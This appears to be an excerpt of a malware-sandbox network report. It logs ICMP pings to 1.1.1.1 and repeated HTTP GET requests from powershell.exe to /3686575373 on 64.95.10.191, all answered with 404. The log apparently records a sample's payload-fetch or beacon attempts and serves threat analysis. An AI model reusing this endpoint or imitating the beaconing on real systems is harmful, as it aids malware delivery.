Apr 23, 2024 17:48:47.878027916 CEST192.168.2.81.1.1.14c99Echo
Apr 23, 2024 17:48:47.984050989 CEST1.1.1.1192.168.2.85499Echo Reply
Apr 23, 2024 17:48:48.893696070 CEST192.168.2.81.1.1.14c98Echo
Apr 23, 2024 17:48:48.999655008 CEST1.1.1.1192.168.2.85498Echo Reply
Apr 23, 2024 17:48:49.912576914 CEST192.168.2.81.1.1.14c97Echo
Apr 23, 2024 17:48:50.018575907 CEST1.1.1.1192.168.2.85497Echo Reply
Apr 23, 2024 17:48:50.053518057 CEST192.168.2.81.1.1.14c96Echo
Apr 23, 2024 17:48:50.159694910 CEST1.1.1.1192.168.2.85496Echo Reply
Apr 23, 2024 17:48:51.065653086 CEST192.168.2.81.1.1.14c95Echo
Apr 23, 2024 17:48:51.171730995 CEST1.1.1.1192.168.2.85495Echo Reply
Apr 23, 2024 17:48:52.082588911 CEST192.168.2.81.1.1.14c94Echo
Apr 23, 2024 17:48:52.188587904 CEST1.1.1.1192.168.2.85494Echo Reply
Apr 23, 2024 17:48:53.096848965 CEST192.168.2.81.1.1.14c93Echo
Apr 23, 2024 17:48:53.202862978 CEST1.1.1.1192.168.2.85493Echo Reply
Apr 23, 2024 17:48:53.515211105 CEST192.168.2.81.1.1.14c92Echo
Apr 23, 2024 17:48:53.621150970 CEST1.1.1.1192.168.2.85492Echo Reply
Apr 23, 2024 17:48:54.519279003 CEST192.168.2.81.1.1.14c91Echo
Apr 23, 2024 17:48:54.625219107 CEST1.1.1.1192.168.2.85491Echo Reply
Apr 23, 2024 17:48:55.534476042 CEST192.168.2.81.1.1.14c90Echo
Apr 23, 2024 17:48:55.640573978 CEST1.1.1.1192.168.2.85490Echo Reply
Apr 23, 2024 17:48:56.552617073 CEST192.168.2.81.1.1.14c8fEcho
Apr 23, 2024 17:48:56.658741951 CEST1.1.1.1192.168.2.8548fEcho Reply
Apr 23, 2024 17:48:56.698093891 CEST192.168.2.81.1.1.14c8eEcho
Apr 23, 2024 17:48:56.804249048 CEST1.1.1.1192.168.2.8548eEcho Reply
Apr 23, 2024 17:48:57.706208944 CEST192.168.2.81.1.1.14c8dEcho
Apr 23, 2024 17:48:57.812097073 CEST1.1.1.1192.168.2.8548dEcho Reply
Apr 23, 2024 17:48:58.721816063 CEST192.168.2.81.1.1.14c8cEcho
Apr 23, 2024 17:48:58.828031063 CEST1.1.1.1192.168.2.8548cEcho Reply
Apr 23, 2024 17:48:59.740236044 CEST192.168.2.81.1.1.14c8bEcho
Apr 23, 2024 17:48:59.846210957 CEST1.1.1.1192.168.2.8548bEcho Reply
Apr 23, 2024 17:49:00.204622030 CEST192.168.2.81.1.1.14c8aEcho
Apr 23, 2024 17:49:00.310730934 CEST1.1.1.1192.168.2.8548aEcho Reply
Apr 23, 2024 17:49:01.206219912 CEST192.168.2.81.1.1.14c89Echo
Apr 23, 2024 17:49:01.312356949 CEST1.1.1.1192.168.2.85489Echo Reply
Apr 23, 2024 17:49:02.221915960 CEST192.168.2.81.1.1.14c88Echo
Apr 23, 2024 17:49:02.327856064 CEST1.1.1.1192.168.2.85488Echo Reply
Apr 23, 2024 17:49:03.237385035 CEST192.168.2.81.1.1.14c87Echo
Apr 23, 2024 17:49:03.343447924 CEST1.1.1.1192.168.2.85487Echo Reply
Apr 23, 2024 17:49:03.368536949 CEST192.168.2.81.1.1.14c86Echo
Apr 23, 2024 17:49:03.474612951 CEST1.1.1.1192.168.2.85486Echo Reply
Apr 23, 2024 17:49:04.378464937 CEST192.168.2.81.1.1.14c85Echo
Apr 23, 2024 17:49:04.487050056 CEST1.1.1.1192.168.2.85485Echo Reply
Apr 23, 2024 17:49:05.393707037 CEST192.168.2.81.1.1.14c84Echo
Apr 23, 2024 17:49:05.500430107 CEST1.1.1.1192.168.2.85484Echo Reply
Apr 23, 2024 17:49:06.410653114 CEST192.168.2.81.1.1.14c83Echo
Apr 23, 2024 17:49:06.520977974 CEST1.1.1.1192.168.2.85483Echo Reply
Apr 23, 2024 17:49:06.819782019 CEST192.168.2.81.1.1.14c82Echo
Apr 23, 2024 17:49:06.925786018 CEST1.1.1.1192.168.2.85482Echo Reply
Apr 23, 2024 17:49:07.835294962 CEST192.168.2.81.1.1.14c81Echo
Apr 23, 2024 17:49:07.941262007 CEST1.1.1.1192.168.2.85481Echo Reply
Apr 23, 2024 17:49:08.847059011 CEST192.168.2.81.1.1.14c80Echo
Apr 23, 2024 17:49:08.953165054 CEST1.1.1.1192.168.2.85480Echo Reply
Apr 23, 2024 17:49:09.862507105 CEST192.168.2.81.1.1.14c7fEcho
Apr 23, 2024 17:49:09.968452930 CEST1.1.1.1192.168.2.8547fEcho Reply
Apr 23, 2024 17:49:10.084757090 CEST192.168.2.81.1.1.14c7eEcho
Apr 23, 2024 17:49:10.190942049 CEST1.1.1.1192.168.2.8547eEcho Reply
Apr 23, 2024 17:49:12.189620972 CEST192.168.2.81.1.1.14c7dEcho
Apr 23, 2024 17:49:12.295726061 CEST1.1.1.1192.168.2.8547dEcho Reply
Apr 23, 2024 17:49:13.268798113 CEST192.168.2.81.1.1.14c7cEcho
Apr 23, 2024 17:49:13.374711037 CEST1.1.1.1192.168.2.8547cEcho Reply
Apr 23, 2024 17:49:14.284269094 CEST192.168.2.81.1.1.14c7bEcho
Apr 23, 2024 17:49:14.390160084 CEST1.1.1.1192.168.2.8547bEcho Reply
Apr 23, 2024 17:49:14.699592113 CEST192.168.2.81.1.1.14c7aEcho
Apr 23, 2024 17:49:14.805859089 CEST1.1.1.1192.168.2.8547aEcho Reply
Apr 23, 2024 17:49:15.706258059 CEST192.168.2.81.1.1.14c79Echo
Apr 23, 2024 17:49:15.812321901 CEST1.1.1.1192.168.2.85479Echo Reply
Apr 23, 2024 17:49:16.721816063 CEST192.168.2.81.1.1.14c78Echo
Apr 23, 2024 17:49:16.827905893 CEST1.1.1.1192.168.2.85478Echo Reply
Apr 23, 2024 17:49:17.737576008 CEST192.168.2.81.1.1.14c77Echo
Apr 23, 2024 17:49:17.843365908 CEST1.1.1.1192.168.2.85477Echo Reply
Apr 23, 2024 17:49:17.874145031 CEST192.168.2.81.1.1.14c76Echo
Apr 23, 2024 17:49:17.979922056 CEST1.1.1.1192.168.2.85476Echo Reply
Apr 23, 2024 17:49:18.878094912 CEST192.168.2.81.1.1.14c75Echo
Apr 23, 2024 17:49:18.984158993 CEST1.1.1.1192.168.2.85475Echo Reply
Apr 23, 2024 17:49:19.893953085 CEST192.168.2.81.1.1.14c74Echo
Apr 23, 2024 17:49:19.999727011 CEST1.1.1.1192.168.2.85474Echo Reply
Apr 23, 2024 17:49:20.909306049 CEST192.168.2.81.1.1.14c73Echo
Apr 23, 2024 17:49:21.015223026 CEST1.1.1.1192.168.2.85473Echo Reply
Apr 23, 2024 17:49:21.352596045 CEST192.168.2.81.1.1.14c72Echo
Apr 23, 2024 17:49:21.458532095 CEST1.1.1.1192.168.2.85472Echo Reply
Apr 23, 2024 17:49:22.368638039 CEST192.168.2.81.1.1.14c71Echo
Apr 23, 2024 17:49:22.474637032 CEST1.1.1.1192.168.2.85471Echo Reply
Apr 23, 2024 17:49:23.378966093 CEST192.168.2.81.1.1.14c70Echo
Apr 23, 2024 17:49:23.485471010 CEST1.1.1.1192.168.2.85470Echo Reply
Apr 23, 2024 17:49:24.399048090 CEST192.168.2.81.1.1.14c6fEcho
Apr 23, 2024 17:49:24.505096912 CEST1.1.1.1192.168.2.8546fEcho Reply
Apr 23, 2024 17:49:24.531173944 CEST192.168.2.81.1.1.14c6eEcho
Apr 23, 2024 17:49:24.636908054 CEST1.1.1.1192.168.2.8546eEcho Reply
Apr 23, 2024 17:49:25.539184093 CEST192.168.2.81.1.1.14c6dEcho
Apr 23, 2024 17:49:25.645231962 CEST1.1.1.1192.168.2.8546dEcho Reply
Apr 23, 2024 17:49:26.549920082 CEST192.168.2.81.1.1.14c6cEcho
Apr 23, 2024 17:49:26.655963898 CEST1.1.1.1192.168.2.8546cEcho Reply
Apr 23, 2024 17:49:27.565690041 CEST192.168.2.81.1.1.14c6bEcho
Apr 23, 2024 17:49:27.671904087 CEST1.1.1.1192.168.2.8546bEcho Reply
Apr 23, 2024 17:49:27.983946085 CEST192.168.2.81.1.1.14c6aEcho
Apr 23, 2024 17:49:28.089868069 CEST1.1.1.1192.168.2.8546aEcho Reply
Apr 23, 2024 17:49:28.987493038 CEST192.168.2.81.1.1.14c69Echo
Apr 23, 2024 17:49:29.093518972 CEST1.1.1.1192.168.2.85469Echo Reply
Apr 23, 2024 17:49:30.003096104 CEST192.168.2.81.1.1.14c68Echo
Apr 23, 2024 17:49:30.109055996 CEST1.1.1.1192.168.2.85468Echo Reply
Apr 23, 2024 17:49:31.018671989 CEST192.168.2.81.1.1.14c67Echo
Apr 23, 2024 17:49:31.124656916 CEST1.1.1.1192.168.2.85467Echo Reply
Apr 23, 2024 17:49:31.160584927 CEST192.168.2.81.1.1.14c66Echo
Apr 23, 2024 17:49:31.266515017 CEST1.1.1.1192.168.2.85466Echo Reply
Apr 23, 2024 17:49:32.174921036 CEST192.168.2.81.1.1.14c65Echo
Apr 23, 2024 17:49:32.281478882 CEST1.1.1.1192.168.2.85465Echo Reply
Apr 23, 2024 17:49:33.192550898 CEST192.168.2.81.1.1.14c64Echo
Apr 23, 2024 17:49:33.298762083 CEST1.1.1.1192.168.2.85464Echo Reply
Apr 23, 2024 17:49:34.206156015 CEST192.168.2.81.1.1.14c63Echo
Apr 23, 2024 17:49:34.312200069 CEST1.1.1.1192.168.2.85463Echo Reply
Apr 23, 2024 17:49:34.615588903 CEST192.168.2.81.1.1.14c62Echo
Apr 23, 2024 17:49:34.721529961 CEST1.1.1.1192.168.2.85462Echo Reply
Apr 23, 2024 17:49:35.628582001 CEST192.168.2.81.1.1.14c61Echo
Apr 23, 2024 17:49:35.734594107 CEST1.1.1.1192.168.2.85461Echo Reply
Apr 23, 2024 17:49:36.643738031 CEST192.168.2.81.1.1.14c60Echo
Apr 23, 2024 17:49:36.749927044 CEST1.1.1.1192.168.2.85460Echo Reply
Apr 23, 2024 17:49:37.660589933 CEST192.168.2.81.1.1.14c5fEcho
Apr 23, 2024 17:49:37.766558886 CEST1.1.1.1192.168.2.8545fEcho Reply
Apr 23, 2024 17:49:37.796861887 CEST192.168.2.81.1.1.14c5eEcho
Apr 23, 2024 17:49:37.902852058 CEST1.1.1.1192.168.2.8545eEcho Reply
Apr 23, 2024 17:49:38.800594091 CEST192.168.2.81.1.1.14c5dEcho
Apr 23, 2024 17:49:38.906645060 CEST1.1.1.1192.168.2.8545dEcho Reply
Apr 23, 2024 17:49:39.815546989 CEST192.168.2.81.1.1.14c5cEcho
Apr 23, 2024 17:49:39.921684027 CEST1.1.1.1192.168.2.8545cEcho Reply
Apr 23, 2024 17:49:40.831267118 CEST192.168.2.81.1.1.14c5bEcho
Apr 23, 2024 17:49:40.937243938 CEST1.1.1.1192.168.2.8545bEcho Reply
Apr 23, 2024 17:49:41.285859108 CEST192.168.2.81.1.1.14c5aEcho
Apr 23, 2024 17:49:41.392256975 CEST1.1.1.1192.168.2.8545aEcho Reply
Apr 23, 2024 17:49:42.300024986 CEST192.168.2.81.1.1.14c59Echo
Apr 23, 2024 17:49:42.406194925 CEST1.1.1.1192.168.2.85459Echo Reply
Apr 23, 2024 17:49:43.335095882 CEST192.168.2.81.1.1.14c58Echo
Apr 23, 2024 17:49:43.440977097 CEST1.1.1.1192.168.2.85458Echo Reply
Apr 23, 2024 17:49:45.362432003 CEST192.168.2.81.1.1.14c57Echo
Apr 23, 2024 17:49:45.469168901 CEST1.1.1.1192.168.2.85457Echo Reply
Apr 23, 2024 17:49:45.504671097 CEST192.168.2.81.1.1.14c56Echo
Apr 23, 2024 17:49:45.610579967 CEST1.1.1.1192.168.2.85456Echo Reply
Apr 23, 2024 17:49:46.527798891 CEST192.168.2.81.1.1.14c55Echo
Apr 23, 2024 17:49:46.633794069 CEST1.1.1.1192.168.2.85455Echo Reply
Apr 23, 2024 17:49:47.538708925 CEST192.168.2.81.1.1.14c54Echo
Apr 23, 2024 17:49:47.644789934 CEST1.1.1.1192.168.2.85454Echo Reply
Apr 23, 2024 17:49:48.550138950 CEST192.168.2.81.1.1.14c53Echo
Apr 23, 2024 17:49:48.655989885 CEST1.1.1.1192.168.2.85453Echo Reply
Apr 23, 2024 17:49:48.969588995 CEST192.168.2.81.1.1.14c52Echo
Apr 23, 2024 17:49:49.075382948 CEST1.1.1.1192.168.2.85452Echo Reply
Apr 23, 2024 17:49:49.988588095 CEST192.168.2.81.1.1.14c51Echo
Apr 23, 2024 17:49:50.094646931 CEST1.1.1.1192.168.2.85451Echo Reply
Apr 23, 2024 17:49:51.003186941 CEST192.168.2.81.1.1.14c50Echo
Apr 23, 2024 17:49:51.109342098 CEST1.1.1.1192.168.2.85450Echo Reply
Apr 23, 2024 17:49:52.020589113 CEST192.168.2.81.1.1.14c4fEcho
Apr 23, 2024 17:49:52.126367092 CEST1.1.1.1192.168.2.8544fEcho Reply
Apr 23, 2024 17:49:52.155911922 CEST192.168.2.81.1.1.14c4eEcho
Apr 23, 2024 17:49:52.262631893 CEST1.1.1.1192.168.2.8544eEcho Reply
Apr 23, 2024 17:49:53.159315109 CEST192.168.2.81.1.1.14c4dEcho
Apr 23, 2024 17:49:53.265233040 CEST1.1.1.1192.168.2.8544dEcho Reply
Apr 23, 2024 17:49:54.175146103 CEST192.168.2.81.1.1.14c4cEcho
Apr 23, 2024 17:49:54.281105995 CEST1.1.1.1192.168.2.8544cEcho Reply
Apr 23, 2024 17:49:55.190664053 CEST192.168.2.81.1.1.14c4bEcho
Apr 23, 2024 17:49:55.296509027 CEST1.1.1.1192.168.2.8544bEcho Reply
Apr 23, 2024 17:49:55.611893892 CEST192.168.2.81.1.1.14c4aEcho
Apr 23, 2024 17:49:55.717778921 CEST1.1.1.1192.168.2.8544aEcho Reply
Apr 23, 2024 17:49:56.628078938 CEST192.168.2.81.1.1.14c49Echo
Apr 23, 2024 17:49:56.734069109 CEST1.1.1.1192.168.2.85449Echo Reply
Apr 23, 2024 17:49:57.643909931 CEST192.168.2.81.1.1.14c48Echo
Apr 23, 2024 17:49:57.751034021 CEST1.1.1.1192.168.2.85448Echo Reply
Apr 23, 2024 17:49:58.659384966 CEST192.168.2.81.1.1.14c47Echo
Apr 23, 2024 17:49:58.765495062 CEST1.1.1.1192.168.2.85447Echo Reply
Apr 23, 2024 17:49:58.791752100 CEST192.168.2.81.1.1.14c46Echo
Apr 23, 2024 17:49:58.897948027 CEST1.1.1.1192.168.2.85446Echo Reply
Apr 23, 2024 17:49:59.800287962 CEST192.168.2.81.1.1.14c45Echo
Apr 23, 2024 17:49:59.906328917 CEST1.1.1.1192.168.2.85445Echo Reply
Apr 23, 2024 17:50:01.785154104 CEST192.168.2.81.1.1.14c44Echo
Apr 23, 2024 17:50:01.891134977 CEST1.1.1.1192.168.2.85444Echo Reply
Apr 23, 2024 17:50:02.805036068 CEST192.168.2.81.1.1.14c43Echo
Apr 23, 2024 17:50:02.911183119 CEST1.1.1.1192.168.2.85443Echo Reply
Apr 23, 2024 17:50:03.214232922 CEST192.168.2.81.1.1.14c42Echo
Apr 23, 2024 17:50:03.320040941 CEST1.1.1.1192.168.2.85442Echo Reply
Apr 23, 2024 17:50:04.221838951 CEST192.168.2.81.1.1.14c41Echo
Apr 23, 2024 17:50:04.328290939 CEST1.1.1.1192.168.2.85441Echo Reply
Apr 23, 2024 17:50:05.237504005 CEST192.168.2.81.1.1.14c40Echo
Apr 23, 2024 17:50:05.343570948 CEST1.1.1.1192.168.2.85440Echo Reply
Apr 23, 2024 17:50:06.253050089 CEST192.168.2.81.1.1.14c3fEcho
Apr 23, 2024 17:50:06.360203028 CEST1.1.1.1192.168.2.8543fEcho Reply
Apr 23, 2024 17:50:06.388726950 CEST192.168.2.81.1.1.14c3eEcho
Apr 23, 2024 17:50:06.494580030 CEST1.1.1.1192.168.2.8543eEcho Reply
Apr 23, 2024 17:50:07.393811941 CEST192.168.2.81.1.1.14c3dEcho
Apr 23, 2024 17:50:07.499761105 CEST1.1.1.1192.168.2.8543dEcho Reply
Apr 23, 2024 17:50:08.409312010 CEST192.168.2.81.1.1.14c3cEcho
Apr 23, 2024 17:50:08.515355110 CEST1.1.1.1192.168.2.8543cEcho Reply
Apr 23, 2024 17:50:09.424972057 CEST192.168.2.81.1.1.14c3bEcho
Apr 23, 2024 17:50:09.531008005 CEST1.1.1.1192.168.2.8543bEcho Reply
Apr 23, 2024 17:50:10.859194994 CEST192.168.2.81.1.1.14c3aEcho
Apr 23, 2024 17:50:10.965131044 CEST1.1.1.1192.168.2.8543aEcho Reply
Apr 23, 2024 17:50:11.862570047 CEST192.168.2.81.1.1.14c39Echo
Apr 23, 2024 17:50:11.968442917 CEST1.1.1.1192.168.2.85439Echo Reply
Apr 23, 2024 17:50:12.878072023 CEST192.168.2.81.1.1.14c38Echo
Apr 23, 2024 17:50:12.984133005 CEST1.1.1.1192.168.2.85438Echo Reply
Apr 23, 2024 17:50:13.894676924 CEST192.168.2.81.1.1.14c37Echo
Apr 23, 2024 17:50:14.000781059 CEST1.1.1.1192.168.2.85437Echo Reply
Apr 23, 2024 17:50:14.022594929 CEST192.168.2.81.1.1.14c36Echo
Apr 23, 2024 17:50:14.128482103 CEST1.1.1.1192.168.2.85436Echo Reply
Apr 23, 2024 17:50:15.034348011 CEST192.168.2.81.1.1.14c35Echo
Apr 23, 2024 17:50:15.140718937 CEST1.1.1.1192.168.2.85435Echo Reply
Apr 23, 2024 17:50:16.049998045 CEST192.168.2.81.1.1.14c34Echo
Apr 23, 2024 17:50:16.156176090 CEST1.1.1.1192.168.2.85434Echo Reply
Apr 23, 2024 17:50:17.065617085 CEST192.168.2.81.1.1.14c33Echo
Apr 23, 2024 17:50:17.171783924 CEST1.1.1.1192.168.2.85433Echo Reply
Apr 23, 2024 17:50:18.486951113 CEST192.168.2.81.1.1.14c32Echo
Apr 23, 2024 17:50:18.593177080 CEST1.1.1.1192.168.2.85432Echo Reply
Apr 23, 2024 17:50:19.503067017 CEST192.168.2.81.1.1.14c31Echo
Apr 23, 2024 17:50:19.609077930 CEST1.1.1.1192.168.2.85431Echo Reply
Apr 23, 2024 17:50:20.518775940 CEST192.168.2.81.1.1.14c30Echo
Apr 23, 2024 17:50:20.624871969 CEST1.1.1.1192.168.2.85430Echo Reply
  • 64.95.10.191
Session IDSource IPSource PortDestination IPDestination PortPIDProcess
0192.168.2.84970564.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:07.963921070 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:08.137562990 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:08 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
1192.168.2.84970664.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:15.811012030 CEST48OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Apr 23, 2024 17:46:15.994256973 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:15 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
2192.168.2.84971064.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:22.569963932 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:22.721709013 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:22 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
3192.168.2.84971164.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:29.287122011 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:29.446631908 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:29 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
4192.168.2.84971264.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:36.561340094 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:36.741537094 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:36 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
5192.168.2.84971364.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:43.318789005 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:43.473573923 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:43 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
6192.168.2.84971464.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:50.021193027 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:50.196583986 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
7192.168.2.84971664.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:46:56.747406960 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:46:56.917072058 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:46:56 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
8192.168.2.84971764.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:04.730249882 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:04.882106066 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:04 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
9192.168.2.84971864.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:11.436594009 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:11.587183952 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:11 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
10192.168.2.84971964.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:18.303435087 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:18.454626083 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:18 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
11192.168.2.84972064.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:25.089874029 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:25.247689962 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:25 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
12192.168.2.84972164.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:31.939913034 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:32.104724884 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
13192.168.2.84972264.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:38.703762054 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:38.855947018 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
ETag: W/"9-0gXL1ngzMqISxa6S1zx3F4wtLyg"
Date: Tue, 23 Apr 2024 15:47:38 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Data Raw: 4e 6f 74 20 46 6f 75 6e 64
Data Ascii: Not Found


Session IDSource IPSource PortDestination IPDestination PortPIDProcess
14192.168.2.84972364.95.10.191807460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
TimestampBytes transferredDirectionData
Apr 23, 2024 17:47:45.782639027 CEST72OUTGET /3686575373 HTTP/1.1
Host: 64.95.10.191
Connection: Keep-Alive
Apr 23, 2024 17:47:45.941970110 CEST275INHTTP/1.1 404 Not Found
X-Powered-By: Express
Access-Control-Allow-Origin: *
Content-Type: text/plain; charset=utf-8
Content-Length: 9
